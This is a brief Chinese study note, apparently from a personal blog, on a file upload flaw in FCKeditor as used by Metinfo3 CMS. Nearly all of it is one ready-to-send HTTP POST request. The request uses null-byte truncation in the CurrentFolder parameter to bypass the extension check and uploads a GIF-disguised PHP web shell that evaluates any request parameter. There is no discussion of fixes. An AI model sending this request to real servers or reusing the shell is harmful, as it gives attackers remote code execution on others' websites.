【笔记】FCKeditor文件上传漏洞

发表于 更新于 阅读次数:

前言

引用了FCKeditor的米拓CMS(Metinfo3)利用00截断实现文件上传漏洞

正文

request
1
2
3
4
5
6
7
8
9
10
11
12
POST http://127.0.0.1:80/fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=x.php%00.gif
Content-Type: multipart/form-data; boundary=-----------------------------000000000000000
Content-Length: 227
Connection: close

-----------------------------000000000000000
Content-Disposition: form-data; name="NewFile"; filename="x.gif"
Content-Type: 227

Gif89a
<?php eval($_REQUEST[x]);?>
-----------------------------000000000000000--

完成

参考文献

哔哩哔哩——xiaodisec